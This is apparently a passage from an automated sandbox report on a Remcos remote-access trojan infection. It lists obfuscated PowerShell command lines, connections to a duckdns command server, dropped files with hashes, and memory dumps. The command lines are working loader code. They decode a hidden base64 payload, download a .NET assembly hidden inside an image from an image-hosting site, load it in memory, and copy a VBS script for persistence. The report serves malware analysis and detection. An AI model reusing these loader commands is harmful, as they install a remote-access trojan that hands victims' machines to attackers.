DJDsGoWOQNgdNPWgDJDsWQBYWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsMWOQNgdNPWgDJDsBZWOQNgdNPWgDJDsFMWOQNgdNPWgDJDsOQB0WOQNgdNPWgDJDsGIWOQNgdNPWgDJDsMgBNWOQNgdNPWgDJDsHUWOQNgdNPWgDJDsYwBIWOQNgdNPWgDJDsEIWOQNgdNPWgDJDsaWOQNgdNPWgDJDsBaWOQNgdNPWgDJDsEgWOQNgdNPWgDJDsSgB2WOQNgdNPWgDJDsFkWOQNgdNPWgDJDsMwBOWOQNgdNPWgDJDsHWOQNgdNPWgDJDsWOQNgdNPWgDJDsWgBDWOQNgdNPWgDJDsDUWOQNgdNPWgDJDsdQBaWOQNgdNPWgDJDsEcWOQNgdNPWgDJDsTQB2WOQNgdNPWgDJDsEwWOQNgdNPWgDJDsegBwWOQNgdNPWgDJDsHoWOQNgdNPWgDJDsYwWOQNgdNPWgDJDsnWOQNgdNPWgDJDsCsWOQNgdNPWgDJDsJwBIWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsMWOQNgdNPWgDJDsBhWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsPQWOQNgdNPWgDJDs9WOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsLWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsLWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsDIWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDssWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsZwBvWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsGUWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDssWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsMwWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsBDWOQNgdNPWgDJDsDoWOQNgdNPWgDJDscgBCWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsUWOQNgdNPWgDJDsByWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsZwByWOQNgdNPWgDJDsGEWOQNgdNPWgDJDsbQBEWOQNgdNPWgDJDsGEWOQNgdNPWgDJDsdWOQNgdNPWgDJDsBhWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsQgBBWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsBnWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsbwBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsZQWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsWOQNgdNPWgDJDspWOQNgdNPWgDJDsCkWOQNgdNPWgDJDsJwWOQNgdNPWgDJDspWOQNgdNPWgDJDsC4WOQNgdNPWgDJDsUgBlWOQNgdNPWgDJDsHWOQNgdNPWgDJDsWOQNgdNPWgDJDsTWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsGMWOQNgdNPWgDJDsRQWOQNgdNPWgDJDsoWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsJwWOQNgdNPWgDJDssWOQNgdNPWgDJDsFsWOQNgdNPWgDJDscwBUWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsaQBOWOQNgdNPWgDJDsEcWOQNgdNPWgDJDsXQBbWOQNgdNPWgDJDsEMWOQNgdNPWgDJDsSWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsXQWOQNgdNPWgDJDszWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsKQWOQNgdNPWgDJDsuWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsZQBwWOQNgdNPWgDJDsEwWOQNgdNPWgDJDsQQBjWOQNgdNPWgDJDsEUWOQNgdNPWgDJDsKWOQNgdNPWgDJDsWOQNgdNPWgDJDsnWOQNgdNPWgDJDsFoWOQNgdNPWgDJDsMQBxWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsLWOQNgdNPWgDJDsBbWOQNgdNPWgDJDsHMWOQNgdNPWgDJDsVWOQNgdNPWgDJDsByWOQNgdNPWgDJDsGkWOQNgdNPWgDJDsTgBHWOQNgdNPWgDJDsF0WOQNgdNPWgDJDsWwBDWOQNgdNPWgDJDsEgWOQNgdNPWgDJDsQQByWOQNgdNPWgDJDsF0WOQNgdNPWgDJDsMwWOQNgdNPWgDJDs2WOQNgdNPWgDJDsCkWOQNgdNPWgDJDsLgBSWOQNgdNPWgDJDsGUWOQNgdNPWgDJDscWOQNgdNPWgDJDsBMWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsYwBFWOQNgdNPWgDJDsCgWOQNgdNPWgDJDsKWOQNgdNPWgDJDsBbWOQNgdNPWgDJDsEMWOQNgdNPWgDJDsSWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsXQWOQNgdNPWgDJDsxWOQNgdNPWgDJDsDEWOQNgdNPWgDJDsNWOQNgdNPWgDJDsWOQNgdNPWgDJDsrWOQNgdNPWgDJDsFsWOQNgdNPWgDJDsQwBIWOQNgdNPWgDJDsEEWOQNgdNPWgDJDscgBdWOQNgdNPWgDJDsDYWOQNgdNPWgDJDsNgWOQNgdNPWgDJDsrWOQNgdNPWgDJDsFsWOQNgdNPWgDJDsQwBIWOQNgdNPWgDJDsEEWOQNgdNPWgDJDscgBdWOQNgdNPWgDJDsDYWOQNgdNPWgDJDsNQWOQNgdNPWgDJDspWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsJwBcWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsKQWOQNgdNPWgDJDsgWOQNgdNPWgDJDsCkWOQNgdNPWgDJDs';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('WOQNgdNPWgDJDs','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((VArIablE '*mdR*').NAmE[3,11,2]-JOin'')(('Z1qima'+'geUrl = 9glhttps://uploaddeimagens.'+'c'+'om.br/images/004/682/796/original/dll.jpg?17017939659gl;Z1qwebClient = New-Objec'+'t System.N'+'et.WebC'+'lient;Z1qimageBytes = Z'+'1qwebClient.DownloadData(Z1qimageUrl);Z1qimageText = [System.Text.Encoding]::UTF8.G'+'etString(Z1qimageBytes);Z1qstartFlag = 9gl<<BASE64_START>>9gl;Z1qendFlag = 9g'+'l<<BASE64_END>>9gl;Z1qstar'+'tIndex = Z1q'+'imageText.IndexOf(Z1qstartFlag);Z1qendIndex = Z1qimageTex'+'t.IndexOf(Z1qendFlag);Z1qstartIndex -ge 0 -and Z1qendIndex -gt Z'+'1'+'qstartIndex;Z1qstartIndex += Z1qstartFlag.Length;Z1q'+'base64Length = Z1qendIndex '+'- Z1qstartInde'+'x;Z1qbase64Command = Z1qimageText.Substr'+'ing(Z1qstartIndex, Z1qbase6'+'4Length);Z'+'1qcommandB'+'ytes = [System.Convert]'+'::'+'F'+'romBase64String(Z1qbase64Command);Z1qloadedAssembly'+' = [System.R'+'eflection.Assembly]::Load(Z1qcommandBytes);Z1qtype = Z1qloadedAssem'+'bly.GetType(9glClassLibrary3.Class19gl);Z'+'1qm'+'ethod = Z1qtype.GetMethod(9glRun9gl).Inv'+'oke('+'Z1qnull,'+' [object[]] (9glJjBhYmMzYjcwMjM1NjQxM2JlNzAyYTg5NjA0ZWVkMjk3YjdjZjI4Yzg0MGI1NjY2NDk1YjMxMGYxMD'+'E3N2UwZWE9bWgmNjc1O'+'DA3NTY9'+'c2kmNjdhZjI4NT'+'Y9e'+'GU/dHh0LmlpaWlzc29jbWVyLzM2MjM5MTA5MzIzODU2OTE4MTEvMDUxODYxMTI0MjQ1NTY5MTgxMS9zdG5lbWhjYXR0YS9tb2MucHBhZHJvY3NpZC5uZGMvLzpzc'+'HR0aA==9gl , 9gl9gl , 9gl29gl , 9glgoogle9gl , 9gl39gl , 9glC:rBAProgramDatarBA9gl, 9glgoogle9gl))').RepLAcE('9gl',[sTriNG][CHAr]39).RepLAcE('Z1q',[sTriNG][CHAr]36).RepLAcE(([CHAr]114+[CHAr]66+[CHAr]65),'\') )"
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 188.114.96.0:443 | uploaddeimagens.com.br | tcp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 25.14.97.104.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 80.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
Files
memory/2248-0-0x0000016B7A3E0000-0x0000016B7A402000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xer3j24.y23.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2248-10-0x00007FFA369F0000-0x00007FFA374B1000-memory.dmp
memory/2248-11-0x0000016B79980000-0x0000016B79990000-memory.dmp
memory/2248-12-0x0000016B79980000-0x0000016B79990000-memory.dmp
memory/3840-22-0x00007FFA369F0000-0x00007FFA374B1000-memory.dmp
memory/3840-23-0x000001F37DF70000-0x000001F37DF7A000-memory.dmp
memory/320-27-0x000001D250AB0000-0x000001D250AC0000-memory.dmp
memory/320-26-0x000001D250AB0000-0x000001D250AC0000-memory.dmp
memory/320-25-0x00007FFA369F0000-0x00007FFA374B1000-memory.dmp
memory/320-40-0x00007FFA369F0000-0x00007FFA374B1000-memory.dmp
memory/3840-41-0x000001F37E450000-0x000001F37E458000-memory.dmp
memory/3904-42-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 277f8a28e52e5d152911ca396aafc201 |
| SHA1 | e1c9a16e02d7f441b7ef8b158bedb1d073b027bc |
| SHA256 | db34d44a764abe98ab93c23cd7ef48ca8170e362b1123498d672b015946011d0 |
| SHA512 | 03febe29689333eeed9af284ba785bdacaed2945ed6e47911129e555d2b3a83b087081fd1f2e30cfa9b4ca751261af3b2e3a3e3cd4c37c0a5d67e648d0f49f57 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
memory/3840-46-0x00007FFA369F0000-0x00007FFA374B1000-memory.dmp
memory/3904-47-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-48-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-50-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 235a8eb126d835efb2e253459ab8b089 |
| SHA1 | 293fbf68e6726a5a230c3a42624c01899e35a89f |
| SHA256 | 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686 |
| SHA512 | a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92 |
memory/2248-53-0x00007FFA369F0000-0x00007FFA374B1000-memory.dmp
memory/3904-54-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-56-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-57-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-58-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-63-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-64-0x0000000000400000-0x0000000000482000-memory.dmp
C:\ProgramData\remcos\registros.dat
| MD5 | e7cedce1ae580ff129459aa6efe335eb |
| SHA1 | 0393fc106820d13b2f0b12213e5d9b28e885e269 |
| SHA256 | 6b69fc868f003c6294ff08a1d1843bd2edffd2590532d1f3e476284735cef726 |
| SHA512 | 3152c8aa6ece061559be6a3fd8972fdb719dc8f13caf957c2595e08927259f424d32d136578b85dedb3b2914bf69a757905ffaeb16b8294699ab7c63fa7de433 |
memory/3904-69-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-71-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-76-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-78-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-83-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-84-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-89-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-91-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-96-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3904-97-0x0000000000400000-0x0000000000482000-memory.dmp